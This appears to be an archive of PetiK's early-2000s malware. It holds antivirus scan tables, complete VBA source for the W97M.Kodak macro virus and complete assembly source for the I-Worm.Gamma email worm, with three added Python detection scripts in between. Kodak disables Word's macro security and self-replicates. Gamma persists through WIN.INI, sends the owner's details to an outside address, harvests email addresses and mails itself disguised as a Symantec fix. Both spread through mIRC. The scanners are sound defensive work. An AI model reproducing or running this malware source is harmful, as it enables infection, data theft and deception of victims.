VBA32 3.12.10.5 2009.05.16 Virus.JS.Germinal
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 JS.Germinal.A

Additional information
File size: 2357 bytes
MD5...: b90254895d6169a8d111a508e2638c51
SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e
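Both HTML.Embargo and JS.Germinal above mark their victims so they do not infect twice: Embargo writes `<embargo>` as the first line of its dropped WinHelp.htm and reads the first line of each wallpaper file before appending its body, and Germinal prepends its own source and checks the first 19 bytes for `// JS.Germinal.A@mm`. Those markers are exactly what a responder can search for. The scanner below is an added example and is not part of the archive or of PetiK's code: it walks a directory tree, checks .htm/.html files for the first-line marker or the `HKLM\Software\HTML.Embargo` string that every Embargo body writes, checks .js files for the Germinal prefix, and strips a first-generation Germinal prepender up to the `// Par PetiK 2nd June 2001` signature line. The sample tree is constructed inline in a temporary directory; the file names in it are invented.

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional

# Infection markers taken from the two sources above.
EMBARGO_FIRST_LINE = "<embargo>"                      # first line of the dropped WinHelp.htm
EMBARGO_BODY_STRING = r"HKLM\Software\HTML.Embargo"   # registry key every Embargo body writes
GERMINAL_PREFIX = "// JS.Germinal.A@mm"               # the 19 bytes Germinal checks before infecting
GERMINAL_SIGNATURE = "// Par PetiK 2nd June 2001"     # last line of the prepended Germinal block


def classify(path: Path) -> Optional[str]:
    """Return the family name if the file carries an infection marker, else None."""
    ext = path.suffix.lower()
    if ext not in (".htm", ".html", ".js"):
        return None
    try:
        text = path.read_text(encoding="latin-1")
    except OSError:
        return None
    first_line = text.split("\n", 1)[0].strip()
    if ext in (".htm", ".html"):
        # The dropped copy starts with <embargo>; wallpaper victims get the body
        # appended instead, so also look for the registry key the body writes.
        if first_line == EMBARGO_FIRST_LINE or EMBARGO_BODY_STRING in text:
            return "HTML.Embargo"
    elif text.startswith(GERMINAL_PREFIX):
        return "JS.Germinal"
    return None


def scan_tree(root: Path) -> Dict[str, str]:
    """Map each infected file (path relative to root, POSIX separators) to its family."""
    hits: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            family = classify(p)
            if family:
                hits[p.relative_to(root).as_posix()] = family
    return hits


def disinfect_germinal(text: str) -> Optional[str]:
    """Strip the outermost Germinal prepender and return the host text.

    Germinal writes its own source followed by the host, and the last line of
    that source is the signature. A later generation prepends its source plus
    the previous host, so re-run classify() on the result. Returns None when
    the signature line is absent.
    """
    lines = text.split("\n")
    for i, line in enumerate(lines):
        if line.strip() == GERMINAL_SIGNATURE:
            return "\n".join(lines[i + 1:])
    return None


def build_sample_tree() -> Path:
    """Constructed sample data: a temp tree with clean and infected files of each kind."""
    root = Path(tempfile.mkdtemp(prefix="petik_scan_"))
    (root / "clean.htm").write_text("<HTML><BODY>hello</BODY></HTML>\n")
    (root / "WinHelp.htm").write_text(
        "<embargo>\n<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>\n<BODY></BODY></HTML>\n")
    (root / "Wallpaper").mkdir()
    (root / "Wallpaper" / "Bubbles.html").write_text(
        "<HTML><BODY>original wallpaper page</BODY></HTML>\n\n"
        "<BODY bgColor=#ffffff><SCRIPT Language=VBScript>\n"
        'ws.RegWrite "HKLM\\Software\\HTML.Embargo\\","c parti"\n'
        "</SCRIPT></BODY>\n")
    (root / "clean.js").write_text("WScript.Echo('hi');\n")
    germinal_block = (GERMINAL_PREFIX + "\n"
                      'var WS=WScript.CreateObject("WScript.Shell")\n'
                      + GERMINAL_SIGNATURE + "\n")
    (root / "host.js").write_text(germinal_block + "WScript.Echo('hi');\n")
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for rel, family in sorted(scan_tree(sample).items()):
        print(f"{family:13s} {rel}")
    print(disinfect_germinal((sample / "host.js").read_text()), end="")
```

The marker check is deliberately the same test the worms themselves run, which makes it cheap but also brittle: a hand-edited copy without the first line would only be caught by the registry-string search, so in practice pair it with a hash or YARA match on the body.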
' Name : W97M.Kodak
' Author : PetiK
' Date : June 5th 2001
' Size 3,030 bytes
'
' Macro AutoOpen : Creates a "script.ini" file for mIRC. If the day is the 5th
' the virus displays a balloon message. It copies itself to \Windows\Kodak.doc.
'
' Macro AutoClose : It lowers the macro security level of Word 9.0 and 10.0 (2000 and XP)
' to 1 (Low). It writes its code into the file "Kodak.vxd" and imports it into "NORMAL.DOT"
' and into the active document; every document created from the infected NORMAL.DOT
' then carries the macro code.
' To avoid infecting "NORMAL.DOT" twice, the virus adds the value :
' HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = ClicClac
'
' Macro HelpAbout : Displays another balloon message
'
' Macro ViewVBCode : Displays a message box and shows the Visual Basic Editor
'
' Macro ToolsOptions and ToolsSecurity : see for yourself (they show the virus protection
' option and the Security... entry as enabled while the dialog is open, then turn them off).

'W97M.Kodak by PetiK 05/10/2001
Sub AutoOpen()
On Error Resume Next
ActiveDocument.SaveAs FileName:="C:\Windows\Kodak.doc"
ActiveDocument.Saved = True
Open "C:\script.drv" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Kodak.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\script.drv", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\script.drv"
If Day(Now) = 5 Then
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "I am always here. And you, are you here."
.Heading = "W97M.Kodak"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End If
End Sub

Sub AutoClose()
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
End If
If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then
Open "C:\Kodak.vxd" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, K
Next i
Close #1
SetAttr "C:\Kodak.vxd", vbReadOnly
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") <> "ClicClac" Then
NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd"
NormalTemplate.Save
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") = "ClicClac"
End If
ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd"
ActiveDocument.Save
End Sub

Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "Smile and cheese for the photo"
.Heading = "W97M.Kodak"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub

Sub ViewVBCode()
MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak"
ShowVisualBasicEditor = True
End Sub

Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub

Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
File Kodak.doc received on 05.16.2009 17:43:05 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Adok!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Adok
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Adok.A
Avast 4.8.1335.0 2009.05.15 MW97:Adok-A
AVG 8.5.0.336 2009.05.15 W97M/Ethan
BitDefender 7.2 2009.05.16 W97M.Kdk.A
CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M
ClamAV 0.94.1 2009.05.16 WM.Psycho
Comodo 1157 2009.05.08 Virus.MSWord.Adok
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNcc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Adok.A
F-Prot 4.4.4.56 2009.05.16 W97M/Adok.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Adok
Fortinet 3.117.0.0 2009.05.16 W97M/Adok.A
GData 19 2009.05.16 W97M.Kdk.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Adok
K7AntiVirus 7.10.737 2009.05.16 Macro.Adok
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Adok
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Adok.A
NOD32 4080 2009.05.15 W97M/Adok.A
Norman 6.01.05 2009.05.16 W97M/Adok.A
nProtect 2009.1.8.0 2009.05.16 W97M.Kdk.A
Panda 10.0.0.14 2009.05.16 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Adok.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Word97.Adok
Sophos 4.41.0 2009.05.16 WM97/Adok-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Adok (v)
Symantec 1.4.4.12 2009.05.16 W97M.Adok.A
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_ABOTUS.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Ethan
ViRobot 2009.5.15.1737 2009.05.15 W97M.Adok
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Adok.A

Additional information
File size: 31232 bytes
MD5...: 84a74bcf024ac4779d20e2b667bc6da6
SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33
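W97M.Maya and W97M.Kodak above are built from the same handful of VBA primitives: an auto-executing macro name (AutoOpen, AutoClose), a macro named after a built-in Word command to intercept it (ViewVBCode, ToolsOptions, ToolsSecurity, HelpAbout), registry writes through System.PrivateProfileString (Kodak uses it to set HKCU\...\Office\9.0\Word\Security\Level to 1), VBProject.VBComponents.Import plus NormalTemplate.Save for self-replication, Outlook.Application and .Send for mailing, and a FileCopy of script.ini into mIRC folders. The heuristic scanner below is an added example, not part of the archive or of PetiK's work: given VBA source text (the kind olevba extracts from a document), it matches each indicator, returns a weighted score with the reasons, and maps the score to a verdict. The rule weights and thresholds are this example's own choices; the sample modules are constructed snippets that reuse lines from the two sources above, plus a benign macro for contrast.

```python
import re
from typing import List, Tuple

# (reason, pattern, weight). Patterns follow what the two macro viruses above
# actually do; the weights are this example's own judgement, not a standard.
RULES: List[Tuple[str, "re.Pattern[str]", int]] = [
    ("autoexec macro",
     re.compile(r"^\s*(Private\s+)?Sub\s+(AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit"
                r"|Document_Open|Document_Close)\b", re.I | re.M), 3),
    ("built-in Word command intercepted",
     re.compile(r"^\s*Sub\s+(ViewVBCode|ToolsOptions|ToolsSecurity|ToolsMacro|HelpAbout)\b",
                re.I | re.M), 2),
    ("registry write via PrivateProfileString",
     re.compile(r'PrivateProfileString\s*\(\s*""\s*,\s*"HKEY_', re.I), 2),
    ("macro security lowered",
     re.compile(r'Word\\Security"\s*,\s*"Level"\s*\)\s*=\s*1', re.I), 4),
    ("VBA project self-replication",
     re.compile(r"VBComponents\.(Import|Export)|CodeModule\.(Lines|CountOfLines)", re.I), 4),
    ("NORMAL.DOT modified",
     re.compile(r"NormalTemplate\.(Save|VBProject)", re.I), 3),
    ("Outlook automation",
     re.compile(r'CreateObject\s*\(\s*"Outlook\.Application"\s*\)', re.I), 3),
    ("mail sent",
     re.compile(r"\.Send\b", re.I), 2),
    ("mIRC script dropped",
     re.compile(r"script\.ini", re.I), 3),
    ("Run key persistence",
     re.compile(r"CurrentVersion\\Run", re.I), 3),
    ("virus protection switched off",
     re.compile(r"Options\.VirusProtection\s*=\s*0", re.I), 4),
]


def score_vba(source: str) -> Tuple[int, List[str]]:
    """Sum the weights of every rule that matches and list the matched reasons."""
    score, reasons = 0, []
    for reason, pattern, weight in RULES:
        if pattern.search(source):
            score += weight
            reasons.append(reason)
    return score, reasons


def verdict(score: int) -> str:
    """Thresholds are this example's choice: one auto-exec macro alone stays clean."""
    if score >= 10:
        return "malicious"
    if score >= 5:
        return "suspicious"
    return "clean"


# Constructed sample: lines lifted from the Kodak AutoClose/ToolsOptions macros above.
SAMPLE_KODAK_LIKE = r'''
Sub AutoClose()
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd"
NormalTemplate.Save
FileSystem.FileCopy "C:\script.drv", "C:\mirc\script.ini"
End Sub
Sub ToolsOptions()
Options.VirusProtection = 0
End Sub
'''

# Constructed benign macro for contrast.
SAMPLE_BENIGN = r'''
Sub FormatReport()
    Selection.Font.Bold = True
    ActiveDocument.Save
End Sub
'''

if __name__ == "__main__":
    for name, src in (("kodak-like", SAMPLE_KODAK_LIKE), ("benign", SAMPLE_BENIGN)):
        s, why = score_vba(src)
        print(f"{name}: score={s} verdict={verdict(s)} reasons={why}")
```

The "macro security lowered" rule only fires on the assignment (`"Level") = 1`), not on the `<> 1&` comparison that precedes it, so a document that merely reads the setting does not score for it.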
comment #
Name : I-Worm.Gamma (w32gammaworm)
Author : PetiK
Date : May 29th - June 9th
Size : 8704 bytes

Action : Checks whether it is running as \WINDOWS\SYSTEM\SETUP.EXE. If not, it copies
itself there, alters the run= line in WIN.INI to the name of the copy, and displays a
fake "not a valid Win32 file" message.
Otherwise, it creates the mIRC script C:\gamma and copies it to C:\mirc, C:\mirc32,
C:\progra~1\mirc and C:\progra~1\mirc32 as script.ini. Then it creates C:\Data and drops
the file info.vbs there. This script sends a message to gammaworm@multimania.com :

Subject : Message from + name of the registered user
Body : Time, Date, Organization, I-Worm.Gamma

On the 5th, when the day is a Wednesday, a message is displayed. When the user clicks
"OK", the worm swaps the mouse buttons.

The worm waits for an active Internet connection, retrying every three minutes, by
attempting to resolve www.symantec.com. Once the connection is up, it scans all *.*htm*
files in "Temporary Internet Files" for email addresses. For each address found, it
sends a copy of itself :

From : snd@symantec.com
Date : 06/06/2001
Subject : Virus/Worms Fix from Symantec Corporation (Norton Antivirus)
Body : Hi,
Symantec Corporation send you the last version of our tool Virus/Worms Fix.
Here is the version 3.1 .
This tool detect, repair and protect users against Bloodhound.IRC.Worm,
Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .

With Regards,
Symantec Corporation (http://www.symantec.com)
Attachment : SETUP.EXE
#
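Five of the works in this archive (Mustard, Embargo, Maya, Kodak and Gamma) share two cheap tricks: a run= line in the [windows] section of WIN.INI for persistence, and a mIRC script.ini whose on-JOIN handler silently DCC-sends the worm to anyone entering a channel (the leading dot in `/.dcc send` suppresses mIRC's echo, so the victim sees nothing). Both leave plain-text evidence that is easy to triage. The script below is an added example and is not part of the archive or of PetiK's work: it parses WIN.INI text and reports non-empty run=/load= entries, and walks a script.ini for on-JOIN blocks containing `dcc send $nick`, returning the file paths such a handler ships. It generalises slightly beyond the listings by handling script.ini files with or without a [script] header (Maya and Kodak write the nN= lines with none) and one-line handlers without braces. The sample WIN.INI and script.ini contents are constructed to match the data above (AVUpdate.exe from Mustard, SETUP.EXE from Gamma). On NT-family Windows the WritePrivateProfileStringA call on WIN.INI's [windows] section is redirected through IniFileMapping into HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows (the load and run values), so run the same check over an export of that key as well.

```python
import re
from typing import Dict, List, Tuple


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Tiny INI parser: {section: {key: value}}. Section and key names are
    lower-cased, ';' lines are comments, keys before any [section] go under ''."""
    sections: Dict[str, Dict[str, str]] = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def winini_autostarts(text: str) -> List[Tuple[str, str]]:
    """Non-empty run=/load= entries of [windows]; anything here starts at logon."""
    windows = parse_ini(text).get("windows", {})
    return [(k, windows[k]) for k in ("load", "run") if windows.get(k)]


JOIN_EVENT = re.compile(r"^/?on\s+\S+:JOIN:", re.I)
DCC_SEND = re.compile(r"/?\.?dcc\s+send\s+\$nick\s+(\S+)", re.I)
LINE_KEY = re.compile(r"^n(\d+)$")


def mirc_dcc_spreaders(text: str) -> List[str]:
    """Paths that an on-JOIN handler DCC-sends to whoever joins a channel."""
    found: List[str] = []
    for entries in parse_ini(text).values():
        # mIRC stores script lines as n0=, n1=, ...; walk them in numeric order
        # and track brace depth so only lines inside an on-JOIN block count.
        numbered = []
        for key, value in entries.items():
            m = LINE_KEY.match(key)
            if m:
                numbered.append((int(m.group(1)), value))
        numbered.sort()
        depth = 0
        for _, value in numbered:
            if depth == 0:
                if not JOIN_EVENT.match(value):
                    continue
                depth = value.count("{") - value.count("}")
            else:
                depth += value.count("{") - value.count("}")
            hit = DCC_SEND.search(value)
            if hit:
                found.append(hit.group(1))
    return found


# Constructed samples: a WIN.INI as Mustard leaves it and the script.ini Gamma drops.
WIN_INI_SAMPLE = r"""[windows]
load=
run=C:\WINDOWS\AVUpdate.exe
NullPort=None

[Desktop]
Wallpaper=(None)
"""

SCRIPT_INI_SAMPLE = r"""[script]
;Don't delete this file
n0=ON 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\WINDOWS\SYSTEM\SETUP.EXE
n3=}
"""

# Kodak/Maya style: no [script] header at all.
SCRIPT_INI_NO_HEADER = r"""n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\Windows\Kodak.doc
n3=}
"""

# A harmless greeter script that must not be flagged.
SCRIPT_INI_BENIGN = r"""[script]
n0=on 1:TEXT:*hello*:#:{ /msg $chan hi $nick }
n1=on 1:JOIN:#:{ /msg $nick welcome }
"""

if __name__ == "__main__":
    print("WIN.INI autostarts:", winini_autostarts(WIN_INI_SAMPLE))
    for name, ini in (("gamma", SCRIPT_INI_SAMPLE), ("kodak", SCRIPT_INI_NO_HEADER),
                      ("benign", SCRIPT_INI_BENIGN)):
        print(f"{name}: {mirc_dcc_spreaders(ini)}")
```

The whole run= value is reported as one entry; WIN.INI allows several programs separated by spaces or commas, so split it further if you need one finding per binary.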

.586p
.model flat,stdcall

include useful.inc

extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindClose:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn gethostbyname:PROC
extrn GetFileSize:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn lstrcmp:PROC
extrn MAPILogoff:PROC
extrn MAPILogon:PROC
extrn MAPISendMail:PROC
extrn MapViewOfFile:PROC
extrn MessageBoxA:PROC
extrn RegCloseKey:PROC
extrn RegOpenKeyExA:PROC
extrn RegQueryValueExA:PROC
extrn SetCurrentDirectoryA:PROC
extrn Sleep:PROC
extrn SwapMouseButton:PROC
extrn UnmapViewOfFile:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC

.data
szComName db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
szTif db 7Fh dup (0)

FileHandle dd ?
RegHandle dd ?
SrchHandle dd ?
octets dd ?
ValueType dd 0
mail_address db 128 dup (?)
MAPISession dd 0

DIR db "C:\Data",00h
information db "C:\Data\info.vbs",00h
infoexec db "wscript C:\Data\info.vbs",00h
mirc db "C:\gamma",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\progra~1\mirc\script.ini",00h
script4 db "C:\progra~1\mirc32\script.ini",00h
Copie db "\SETUP.EXE",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
TEXTE db "This file does not appear to be a Win32 valid file. ",00h
TITRE2 db "I-Worm.Gamma (c)2001",00h
TEXTE2 db "PetiK greets you",00h
symantec db "www.symantec.com",00h
tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h
Value db "Cache",00h
FICHIER db "*.*htm*",00h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ equ 00000004h
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
HKEY_USERS equ 80000003h
KEY_QUERY_VALUE equ 00000001h
KEY_SET_VALUE equ 00000002h
MAX_PATH equ 260
OPEN_EXISTING equ 00000003h
PAGE_READONLY equ 00000002h
REG_SZ equ 00000001h

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

time struc
LowDateTime dd ?
HighDateTime dd ?
time ends
win32 struc
FileAttributes dd ?
CreationTime time ?
LastAccessTime time ?
LastWriteTime time ?
FileSizeHifh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd MAX_PATH (?)
AlternativeFileName db 13 dup (?)
db 3 dup (?)
win32 ends
CHERCHE win32 <>

mircd: db "[script]",0dh,0ah
db ";Don't delete this file",0dh,0ah
db "n0=ON 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",0dh,0ah
MIRCTAILLE equ $-mircd

infod: db ''' Symantec ScriptBlocking Authenticated File',0dh,0ah
db ''' A3C7B6E0-5535-11D5-911D-444553546170',0dh,0ah
db '',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'set w=CreateObject("WScript.Shell")',0dh,0ah
db 'If w.RegRead("HKLM\Software\Gamma\") <> "OK" Then',0dh,0ah
db 'set o=CreateObject("Outlook.Application")',0dh,0ah
db 'set m=o.CreateItem(0)',0dh,0ah
db 'n=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")',0dh,0ah
db 'p=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")',0dh,0ah
db 'm.To = "gammaworm@multimania.com"',0dh,0ah
db 'm.Subject = "Message from " & n',0dh,0ah
db 's = "Time : " & time',0dh,0ah
db 's = s & vbCrLf & "Date : " & date',0dh,0ah
db 's = s & vbCrLf & "Organization : " & p',0dh,0ah
db 's = s & vbCrLf & vbCrLf & " I-Worm.Gamma"',0dh,0ah
db 'm.Body = s',0dh,0ah
db 'm.DeleteAfterSubmit=True',0dh,0ah
db 'm.Send',0dh,0ah
db 'w.RegWrite "HKLM\Software\Gamma\", "OK"',0dh,0ah
db 'End If',0dh,0ah
INFOTAILLE equ $-infod

Email dd ?
dd offset Subject
dd offset Message
dd ?
dd offset DateS
dd ?
dd 2
dd offset MelFrom
dd 1
dd offset MelTo
dd 1
dd offset Attach
MelFrom dd ?
dd ?
dd offset MelFrom
dd offset sAddr
dd ?
dd ?

MelTo dd ?
dd 1
dd offset MelTo
dd offset mail_address
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset szOrig
dd ?
dd ?
Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h
Message db "Hi,",0dh,0ah,0dh,0ah
db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. "
db "Here is the version 3.1 .",0dh,0ah
db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, "
db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah
db 09h,09h,"With Regards,",0dh,0ah
db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h
DateS db "06/06/2001",00h
sAddr db "snd@symantec.com",00h

.code
DEBUT:
VERIF: push 00h
call GetModuleHandleA
push 50
push offset szOrig
push eax
call GetModuleFileNameA

push 50h
push offset szCopie
call GetSystemDirectoryA
push offset Copie
push offset szCopie
call lstrcat

push offset szOrig
push offset szCopie
call lstrcmp
test eax,eax
jz MIRC

COPIE: push 00h
push offset szCopie
push offset szOrig
call CopyFileA

WININI: push 50
push offset szWinini
call GetWindowsDirectoryA
push offset Winini
push offset szWinini
call lstrcat
push offset szWinini
push offset szCopie
push offset run
push offset windows
call WritePrivateProfileStringA

MESSAGE:push 1010h
push offset szOrig
push offset TEXTE
push 00h
call MessageBoxA
jmp FIN

MIRC: push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_ALWAYS
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset mirc
call CreateFileA
mov [FileHandle],eax
push 00h
push offset octets
push MIRCTAILLE
push offset mircd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
C_MIRC: push 00h
push offset script1
push offset mirc
call CopyFileA
push 00h
push offset script2
push offset mirc
call CopyFileA
push 00h
push offset script3
push offset mirc
call CopyFileA
push 00h
push offset script4
push offset mirc
call CopyFileA

INFO: push offset DIR
call CreateDirectoryA
push 00h
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset information
call CreateFileA
cmp eax,-1
je DATE
mov [FileHandle],eax
push 00h
push offset octets
push INFOTAILLE
push offset infod
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
push 01h
push offset infoexec
call WinExec

DATE: push offset SystemTime
call GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne NET
cmp [SystemTime.wDay],05h
jne NET
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
call MessageBoxA
push 01h
call SwapMouseButton
jmp NET

PAUSE: push 60 * 3 * 1000
call Sleep

NET: push offset symantec
call gethostbyname
test eax,eax
jz PAUSE
TIF: push offset RegHandle
push KEY_QUERY_VALUE
push 00h
push offset tempnetfile
push HKEY_USERS
call RegOpenKeyExA
test eax,eax
jnz FIN
push 7Fh
push offset szTif
push offset ValueType
push 00h
push offset Value
push [RegHandle]
call RegQueryValueExA

push [RegHandle]
call RegCloseKey

TIFCH: push offset szTif
call SetCurrentDirectoryA

FFF: push offset CHERCHE
push offset FICHIER
call FindFirstFileA
cmp eax,-1
je FC
mov [SrchHandle],eax
cHTML: call HTML
FNF: push offset CHERCHE
push [SrchHandle]
call FindNextFileA
dec eax
jnz cHTML
FC: push [SrchHandle]
call FindClose

END_S: popad

FIN: push 00h
call ExitProcess

HTML: pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset CHERCHE.FileName
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1

xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi

push 00h
push ebx
call GetFileSize
xchg eax,ecx
jecxz FERME3

ls_s_m: call @mt
db 'mailto:'
@mt: pop edi
l_s_m: pushad
push 07h
pop ecx
rep cmpsb
popad
je s_m
inc esi
loop l_s_m

FERME3: push esi
call UnmapViewOfFile
FERME2: push ebp
call CloseHandle
FERME1: push ebx
call CloseHandle
popad
ret

s_m: xor edx,edx
add esi,7
mov edi,offset mail_address
push edi
n_c: lodsb
cmp al,' '
je s_c
cmp al,'"'
je e_c
cmp al,''''
je e_c
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_c
s_c: inc esi
jmp n_c
e_c: xor al,al
stosb
pop edi
test edx,edx
je ls_s_m

mapiln: xor eax,eax
push dword ptr [MAPISession]
push eax
push eax
push eax ; password
push eax ; username
push eax
call MAPILogon

mapism: xor eax,eax
push eax
push eax
push offset Email
push eax
push word ptr [MAPISession]
call MAPISendMail
mapilf: xor eax,eax
push eax
push eax
push eax
push dword ptr [MAPISession]
call MAPILogoff

jmp ls_s_m

end DEBUT
File Gamma.exe received on 05.16.2009 11:58:18 (CET)
